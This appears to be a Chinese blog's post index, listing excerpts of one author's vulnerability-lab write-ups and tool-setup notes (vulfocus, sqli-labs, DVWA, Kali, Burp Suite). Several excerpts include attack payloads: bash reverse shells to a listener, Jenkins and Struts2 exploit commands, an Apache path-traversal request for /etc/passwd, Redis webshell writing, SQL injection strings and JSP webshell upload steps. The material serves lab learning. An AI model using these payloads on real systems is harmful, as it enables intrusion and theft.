自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(39)
  • 收藏
  • 关注

原创 phpstudy 搭建 upload-labs 文件上传靶场

启动phpstudy, 然后浏览器访问:127.0.0.1/upload-labs 即可。下载完压缩文件,解压文件,解压后的文件夹命名为upload--labs。将解压后到文件夹放到phpstudy 的WWW目录下。

2024-05-01 11:19:15 530

原创 vulfocus 靶场struts2 代码执行 (CVE-2020-17530)

由于Struts2 会对某些标签属性(比如 id) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x} 且 x 的值用户可控时,用户即可构造一些SSRF、远程命令执行等形式的payload,并将这些恶意payload以%{...}形式传入该标签属性, 即可造成OGNL表达式执行。bash -c {echo,编码后的内容} |{base64 ,-d}|{bash , -i} #或: 抓包,改为如下内容: 红色部分为要更改的地方。监听机进行监听:nc -lvvp。

2024-04-24 10:33:50 1003 2

原创 vulfocus靶场struts2 命令执行 CVE-2016-3081

后面接payload。Struts 2服务器上执行任意代码,取得网站服务器控制权。payload: 红色部分为可替换的执行命令。远程攻击者利用漏洞可。

2024-04-23 16:50:52 492

原创 vulfocus 靶场 jetty 敏感信息泄露 (CVE-2021-28169)

对于 <= 9.4.40、<= 10.0.2、<= 11.0.2 的 Eclipse Jetty 版本,对带有双重编码路径的 ConcatServlet 的请求可以访问 WEB-INF 目录中的受保护资源。例如,对 `/concat?/%2557EB-INF/web.xml` 的请求可以检索 web.xml 文件。这可能会泄露有关 Web 应用程序实施的敏感信息。对W进行编码为 %2557,访问:static?

2024-04-23 16:32:31 495

原创 vulfocus靶场jenkins代码执行漏洞cve-1027-1000353

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,上一步生成的base64编码}|{base64,-d}|{bash,-i}"python3 exploit.py http://受害者IP:端口 jenkins_poc.ser。bash -i >& /dev/tcp/监听机的IP/端口 0>&1。攻击机监听: nc -lvp 4444。GitCode - 开发者的代码家园。

2024-04-23 12:09:43 367 1

原创 vulfocus靶场thinkphp命令执行cve-2018-1002015

漏洞,该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤。远程攻击者可通过输入‘\’字符的方式调用任意方法利用该漏洞执行代码。thinkPHP 5.0.x版本和5.1.x版本中存在。使用工具: thinkphp综合利用工具,然后使用webshell工具进行连接即可。

2024-04-21 21:36:34 429

原创 kali /mac 成功的反弹shell语句

2: 这条命令使用,kali 上执行的命令结果会在mac机器上显示出来,mac无法执行命令,kali上执行命令无结果,结果在mac上显示。8: 这个命令,在攻击机上执行,如果有报错会显示在受害者机器上,,攻击机上不显示报错语句。13:这条命令是同步两边执行的命令,不会显示结果。3: 命令执行成功,能反弹成功,但是输入命令无显示,不会用。14: 这条命令在攻击机上报错也不会同步到受害者机器上。该语句在监听机器上执行的语句会同步到被攻击机上。攻击机执行 ncat -u -lvp 3333。

2024-04-21 18:00:53 1260

原创 kali搭建vulfocus靶场

运行成功,打开了浏览器:输入http://192.168.19.111:1212 打开登陆页面,默认的用户名和密码是admin 和 admin。docker run -d -p 映射端⼝:80 -v /var/run/docker.sock:/var/run/docker.sock。# docker version # 查看当前是否有docker,如果无docker ,则进行docker安装。映射端口是自己随意取的端口,IMAGE ID 就是刚刚docker images 命令查询出来的ID,

2024-04-20 16:28:39 676 1

原创 vulfocus靶场tomcat-cve_2017_12615 文件上传

攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。默认情况下readonly是true,此时PUT和DELETE方法是被拒绝的,当readonly为false时,便会开启。Windows上的Apache Tomcat如果开启PUT方法(默认关闭),则存在此漏洞,攻击者可以利用该漏洞上传JSP文件,从而导致远程代码执行。7.0.0-7.0.81 影响版本。

2024-04-19 19:26:54 300

原创 vulfocus靶场tomcat-pass-getshell 弱口令

连接: http://ip:port/目录/muma.jsp。哥斯拉:管理》生成〉javaDy> muma.jsp。通过弱口令登录后台,部署war包geshell。将生成的后门文件后缀名jsp改为war。上传文件:上传后会生成一个新的文件目录。登陆成功,上传恶意代码文件。

2024-04-19 18:21:09 303

原创 vulfocus靶场名称: apache-cve_2021_41773/apache-cve_2021_42013

Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。目录遍历:GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd。1:get:在url后面加上。远程代码执行:bp抓包。

2024-04-19 11:57:29 603

原创 vulfocus靶场couchdb 权限绕过 (CVE-2017-12635)

应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。数据改包前测试:登陆IP:IP:63073/_utils,出现登陆页面,输入用户名和密码,显示错误。点击New 点击 HTTP。

2024-04-18 19:04:16 434

原创 vulfocus靶场redis 未授权访问漏洞之CNVD-2015-07557

python3 redis-rogue-server.py --rhost 目标IP --rport 目标端口 --lhost 攻击者服务器IP。>" #向文件中写入内容。config set dbfilename 1.php #写入文件。主从复制getshell,写入恶意的so文件达到执行系统命令的目的。config set dir /tmp #创建临时目录。利用条件:需要web目录有读写权限,只有读权限会失败。证明web目录具有写权限,可以进行利用。

2024-04-18 14:03:06 749

原创 vulfocus靶场之redis命令执行cve-2022-0543漏洞复现

我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。输入网址和端口,点击OK。

2024-04-18 11:37:29 875 4

原创 Mac电脑安装蚁剑

以该图为主页面:antSword为源码,AntSword-Loader为加载器,下载的时候我都选择下载到桌面了,用户可以自定义下载目录。下载的时候我是选择都下载到桌面了,下载完成后,将master那个解压到桌面,然后双击loader,dmg那个文件。打开之后,点击初始化:选择文件夹的时候,选择桌面上刚刚解压完成的源码文件夹即可,然后会提示完成,重启即可。下载源码:主页面点击antSword>点击code 》点击Download ZIP进行源码下载。再次在启动台APP里面点击antSword,即可使用。

2024-04-12 17:51:37 1026

原创 sql 注入 之sqli-labs/less-6 双注入,双引号报错注入

查询字段内容,返回结果超过一行,使用limit函数。limit 4,1 返回username字段。limit 5,1 返回password字段。内容有多行,所以使用limit依次查询。limit 3,1 查出来users表。返回超过1 行,使用limit进行处理。和第五关类似,只不过闭合符号是双引号。

2024-03-03 23:06:12 557

原创 sql 注入 之sqli-labs/less-5 双注入,也称:报错注入

模板:select * from user where id=1 and (updatexml("任意字符", concat(0x7e,模板:select * from user where id =1 and (extractvalue(1,concat(0x7e,,0x7e),"任意字符"));该关卡返回正确或者错误页面,还有错误的代码,所以可以使用报错注入。limit 0,1 limit 1,1 limit 5,1 分别查出字段名。0x3c,0x68,0x72,0x2f,0x3e : 换行符。

2024-03-03 22:48:33 1034

原创 sql注入之sqli-labs/less-4 双引号加括号

id=-1")union%20select%201,2,group_concat(table_name) from information_schema.tables where table_schema=database()%20--+返回结果太长,使用换行符:group_concat(username,0x5e,password,0x3c,0x68,0x72,0x2F,0x3E)id=-1")union%20select%201,2,database()%20--+

2024-03-03 17:37:22 401

原创 sql注入之sqli-labs/less-3 单引号加括号闭合

再次试探:id=1 ') order by 3 --+报错信息里面出现 ') 说明闭合符合里面还有个 )输入单引号试探: id=1 '

2024-03-03 17:06:20 452

原创 sql注入之sqli-labs-less-2 数值型报错注入

' 进行试探,第二关数值型,没有字符串的单引号,所以输入单引号报错,id=1 order by 3 --+

2024-03-03 16:47:05 392

原创 sql注入之sqli-labs-less-1 错误注入

开始查看数据库内容:id=-1' union select 1,database(),3 --+得到当前数据库是security。

2024-03-03 16:06:04 394

原创 sql注入之cookie 注入,user-agent注入

BP 抓包,在user- agent 注入,页面没有正确错误回显。页面没有正确错误显示,BP抓包,在抓包内容里面看到输入内容在cookie 里面。注入:cookie:user =1' order by 3#sqlmap :保存文件,参数位置加*或者指定参数-p。抓包后,cookie: user=admin。cookie 身份验证信息。在cookie里面进行注入。

2024-02-27 21:33:14 450

原创 sql注入之post 传参方式的注入

sqlmap -r ./sqlmapfile(-r 捕获的请求文件及其所在位置) -p id(加入指定参数) --cookie=""先将post请求在burp捕获,将抓到的请求内容保存到文件中,在sqlmap安装 目录下面新建文本文件为x.txt。是否存在注入点,注入点在有和数据库服务器交互的地方。加入-p 指定参数 -p id。在输入框里面进行注入。

2024-02-27 20:47:37 1151

原创 sql注入之sqlmap 自动化

sqlmap -u "http:// xx" --tables -D "数据库名字"查出来表后,对某个表进行查询列名。sqlmap -h 查看参数。带有cookie 的。

2024-02-25 20:20:55 477

原创 phpstudy 搭建sqli-labs 靶场

进入www的sqlite-labs目录,进入sql-connections目录,找到 db-creds.inc,编辑该文件。返回到登陆后的页面,点击setup/reset database for labs,如下图箭头所指。dbpass ='123456' 123456是phpstudy的数据库里面设置的密码。dbuser ='root' root 是phpstudy的数据库里面设置的用户名。启动phptudy ,点击数据库,查看数据库用户名和密码。将解压缩后的sqli-labs文件放到WWW目录下。

2024-02-23 17:33:54 605

原创 sql 盲注:布尔盲注,时间盲注

substr('string',1,1)截取字符串裡面的字符,從第一位開始,截取一個字符。id=1 ' and length(database ())>10 --+猜出来长度。使用二分法猜长度,再使用ascii猜字符。用布尔盲注得不到反馈时,尝试使用时间盲注。然后根据长度依次猜单个字符。

2024-02-23 10:27:47 375

原创 sql 之 报错注入

第一个参数错误,执行第二个参数,从而将第二个参数里面的sql 语句执行结果返回。updatexml (目标文件,文件路径,更改内容)使用updatexml 函数。

2024-02-20 20:32:47 357

原创 七层模型之协议与相关工具

ping www.braiding.com -c 3发送3次数据包。#arping 192.xxx -c 3 发送3次数据包。跟踪路由,查看从当前主机到目标主机之间经过哪些网络设备。主动发现局域网内存活主机,不安全,会被网络管理员发现。四层,tcp up 协议,可使用nmap 工具。三层,网络层,一般使用IP ICMP 协议,-p 被动模式,不发送任何内容,只做嗅探。-p 1-200 指定端口,或者端口范围。-g 扫描网段,如单个网络,则不用加。被动扫描,隐蔽,速度慢,-O 扫描服务器版本。

2024-01-19 16:15:16 363

原创 sql注入之宽字节注入 ,URL解码注入

内联注释:select username from /*!user */ /*!select and被屏蔽时:selselectect anandd。sel%00ect ,mysql 中不会截断,但是wag 可能认为截断。% : sel%ect ,如果是iis+asp 百分号会被忽略。利用%bf和%5c组成新的汉字,%dd%5c。特殊字符绕过:and && or ||代码里面使用url将输入内容进行编码。%25 对应的url編碼為%

2024-01-02 14:12:07 433

原创 墨者学院-SQL手工注入漏洞测试(MySQL数据库-字符型)

到md5 里面转换密码,登陆账户,得到KEY。能正确返回结果,使用union进行页面回显。开启靶场,尝试在输入框注入,发现无法注入。点击下面滚动条:进行单引号测试闭合方式。对比group_concat。返回结果,尝试用斜杠隔开。

2023-09-16 17:16:27 84

原创 DVWA sql注入记录

输入 1' union select 1, database() #输入 ' ,有报错,存在sql 注入。

2023-09-15 16:54:26 135

原创 kali 安装docker,dvwa

浏览器输入: 127.0.0.1:8000 或者本机IP地址: 192.168.xx.xxx:8000。infoslack/dvwa 和 IMAGE ID 一样,使用ID 也可以。然后在 NAME 那一列下面选择一个镜像源,我选择的是 infoslack/dvwa ,然后下载,然后命令执行: apt install docker.io ,在需要确认的地方输入 Y。查看当前kali是否有 docker, 提示没有docker, 需要安装。-p 为了安全起见,将80端口改为88 ,或者其他端口。

2023-09-15 14:31:01 286

原创 Mac电脑使用Phpstudy搭建DVWA

原因是因为: 在PHP study》 数据库管理中修改过root的密码,导致配置文件中的账号密码和数据库里面的账号密码对不上。打开浏览器,输入自己本机的IP地址:192.168.xx.xx. 或者输入 :127.0.0.1。后面的DVWA的配置文件中修改的账号和密码要和此处的保持一致,否则会报错。解压安装包,将文件夹名称改为: DVWA ,不改也行。网站链接:https://www.xp.cn。修改一下数据库密码:数据库》修改root密码。根据电脑类型选择下载版本。把解压后的DVWA的文件拖到这个里面。

2023-09-14 18:49:07 864

原创 kali使用自带burpsuite,火狐浏览器设置代理

打开kali,点击火狐浏览器,浏览器点击设置》常规〉下拉找到网络设置》点击设置:如下图。点击kali左上角图标应用程序》web程序〉打开burpsuite,查看代理IP地址和端口:点击proxy settings。打开BP,一直next就行了,把intercept打开。后面浏览器配置代理IP和端口要和这个保持一致。将代理更改为如下设置:和上文BP里面的保持一致。这些设置完,重启了一下虚拟机:reboot。点击forward ,网页正常浏览。浏览器设置》隐私与安全〉查看证书。BP关闭时,打开Firefox。

2023-09-13 16:54:46 3766 6

原创 kali 配置sshd服务

apt-install openssh-server ( 普通用户要加sudo : sudo apt-install xxx)服务还是没开,所以重启了一下ssh服务,再次查看发现端口已经好了。ssh 服务有问题,安装openssh-server。root用户下操作,如普通用户,需要加sudo。scp 失败,提示kali ssh端口有问题。安装完成后,查看ssh 服务是否正常了。打开kali,查看ssh 服务。

2023-09-13 16:14:16 654

原创 英文版kali 变中文版

重启(root账号登陆,直接 reboot ,普通用户登陆: sudo reboot)普通用户登陆: sudo dpkg-reconfigure locales 回车。回车,上下键选择语言: -》zh_CN.UTF-8 UTF-8。root 用户登陆: 不需要sudo。

2023-09-13 15:54:12 53

原创 MAC 电脑给burpsuite安装证书

浏览器输入: 127.0.0.1:8080。点击右上角 C A Cerfificate 进行下载。浏览器: 设置,隐私与安全里面,点击-》 管理设备证书,将该证书内容全部选择为:始终信任。Chrome 设置代理 127.0.0.1:8080。和 BP 里面的一致。下载完成后,在下载目录里面找到cacert.der文件,并双击该文件。Chrome : 设置 -> 系统 -》 打开代理设置-〉前提: burpsuite 已经安装好破解版。关闭保存该窗口,证书OK。

2023-09-13 13:35:00 2487

原创 python 3 -- 打印乘法口诀表

always forget how to do this ,but try to think more and do more, will success !

2020-09-01 22:15:20 152

原创 centos修改IPifconfig,重启时网络生效

1,cd/etc/sysconfig/network-scripts2.ls3.vim ifcfg-em1(需要修改的端口)IPADDR=...(需要修改的IP)ONBOOT=yes(重启时网络生效。)改完之后重启服务:service network restart或者在图形化界面中点击关闭按钮之后再点击开启,也相当...

2018-06-08 17:39:47 108 1

DVWA-master.7z 压缩包

下载到本地,解压缩之后,重命名为DVWA,并将其放在PHPstudy的WWW目录下

2023-09-14

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除